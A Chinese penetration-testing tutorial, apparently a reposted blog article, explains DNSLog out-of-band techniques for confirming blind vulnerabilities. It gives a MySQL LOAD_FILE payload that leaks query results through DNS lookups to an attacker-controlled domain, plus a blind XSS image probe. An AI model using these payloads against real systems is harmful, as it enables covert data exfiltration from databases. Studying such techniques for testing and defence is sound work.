使用DNSLog进行盲打

admin 2022年4月20日03:20:25使用DNSLog进行盲打已关闭评论48 views字数 1076阅读3分35秒阅读模式

目录


渗透测试中,当我们碰到无回显的漏洞是非常难利用的。一是我们不知道存不存在漏洞,二是我们不知道漏洞执行的结果。因此,针对无回显的漏洞,我们可以通过使用DNSLog来进行回显。DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。  

DNSLog 

首先,我们都知道DNS的解析过程,递归查询和迭代查询相结合,传送门:DNS解析过程 

这里我们可以控制的是域名的DNS服务器,也就是如下的 "baidu.com" 的DNS服务器。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。

DNSLog部署过程:

  • 申请一个域名,如 xie.com
  • 在我们的VPS上安装并配置DNS服务器
  • 将 xie.com 的DNS服务器设置为我们的VPS地址
  • 这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。

但是由于部署非常麻烦,所以我们可以通过一些在线的DNSLog平台:

SQL盲注回显

不管是布尔类型盲注还是时间盲注,都需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP。所以,如果条件允许,我们可以结合DNSlog来快速的回显数据。MySQL数据库,通过DNSlog盲注需要用到 load_file() 函数,该函数不仅能加载本地文件,同时也能对URL发起请求。因为需要使用 load_file() 函数,所以需要root权限,并且 secure_file_priv 需要为空。传送门:MySQL数据库中的文件操作函数(load_file()、into outfile、into dumpfile)

Payload如下:

SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx\\abc'));

执行的语句 

DNSLog平台收到的DNS查询

无回显的XSS

payload

<img src=http://hf8r67.dnslog.cn>

DNSLog平台收到的DNS查询

即可证明存在XSS

更多盲打Payload

更多漏洞的Payload,查看ceye的后台,

 如果想跟我一起讨论的话,就快加入我的知识星球吧。星球里有一千多位同样爱好安全技术的小伙伴一起交流!知识星球 | 深度连接铁杆粉丝,运营高品质社群,知识变现的工具

 参考文章:使用DNSLOG拯救你的盲打盲注

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日03:20:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用DNSLog进行盲打http://cn-sec.com/archives/928574.html